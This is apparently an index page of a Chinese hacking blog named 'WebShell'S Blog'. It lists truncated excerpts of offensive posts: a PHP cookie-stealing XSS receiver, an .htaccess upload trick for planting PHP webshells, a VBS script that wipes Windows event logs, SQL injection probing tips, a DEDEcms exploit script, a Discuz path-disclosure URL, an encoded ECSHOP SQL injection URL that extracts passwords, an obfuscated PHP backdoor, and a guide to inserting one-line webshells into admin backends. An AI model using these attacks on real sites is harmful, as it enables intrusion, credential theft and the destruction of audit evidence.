WebShell'S Blog

不解释！   <?php $ip = $_SERVER['REMOTE_ADDR']; ; $referer = $_SERVER['HTTP_REFERER']; $cookie = $_GET['c']; $agent = $_SERVER['HTTP_USER_AGENT']; $subject='远程XSS获取地址-域名：'.$referer; $body="<p&g...

- 阅读全文 -

有些服务器开启了.htaccess文件上传，那么经常碰到fckeditor的就可以利用该文件上传一个phpshell。 1.创建一个.htaccess文件，内容如下：   <FilesMatch "_php.gif"> SetHandler application/x-httpd-php </FilesMatch>     2.上传shell ...

- 阅读全文 -

删除日志VBS： cleanevent.vbs strComputer = "主机名字By foolishqiang" Set objWMIService = GetObject（"winmgmts:" _ & "{impersonationLevel=impersonate,（Backup）}!\\" & _ strComputer & "\root\cimv2"） di...

- 阅读全文 -

1、加引号'这个最常用   2、变参数类型，比如把id=1改为id=a等 有时很有效果   3、乱添数据,比如把id=1改为id=1111111111111111111111......等 有时很有效果   4、text.php?aa[]=xx   5、利用php的max_execution_time, 能将绝对路径显示出来. 这机率非常小.适合在服务器负荷...

- 阅读全文 -

#!usr/bin/php -w <?php error_reporting(E_ERROR); set_time_limit(0); print_r(' DEDEcms Variable Coverage Exploit Author: [url]www.heixiaozi.com[/url] [url]www.webvul.com[/url] ); echo "\r\n"; if($ar...

- 阅读全文 -

这里只是说下方法，在要爆DZ 7.2 bbs的网站后面加上以下代码访问，即可爆出。"manyou/admincp.php?my_suffix=%0A%0DTOBY57"，引号不算。 例如:https://www.webshell.cc/manyou/admincp.php?my_suffix=%0A%0DTOBY57

- 阅读全文 -

ECSHOP 利用网上的EXP: search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjd...

- 阅读全文 -

实际应用： 首先，打开你的文本编辑器，比如记事本，新建一个文本文件，按照那个解密代码，把我的那个footer.php文件里的密码输入进去，然后就类似下面： <?php $Code = 'bZA7b8MwDIR3/wpCQ9MudtCpaPxYOmTo1gIZC9mibSGyKEiM1QD98fUjWVovBHQ83n1QVSa50iM0RoZQiJaI0Yst8Yu/eV7UHrJynclD...

- 阅读全文 -

一般要操作COOKIE有三种方式: 1.客户端浏览器按照协议规定接受服务端的set-cookie头操作cookie。 2.客户端浏览器通过DOM接口操作cookie。 3.直接在客户端构造好浏览器接受的cookie文件。 下面就说下具体实现的思路： 第1种可以在本地proxy或者hook浏览器socket send recv甚至NDIS驱动实现。 第2种比如简单的可以将IE封装独立程序或者BHO的...

- 阅读全文 -

php后台插一句话的思路加114网址导航后台拿webshell的方法。 首先介绍下php的各种标签： 1)： <?php ?> demo: <?php echo "test";?> 这个标签现在程序大多都是使用的这种标签！大家都不陌生了，这里就不多介绍了！ 2)： <? echo "test"; ?> 这种标签是在以前很普遍的一种用法php 老版本开发的cms大...

- 阅读全文 -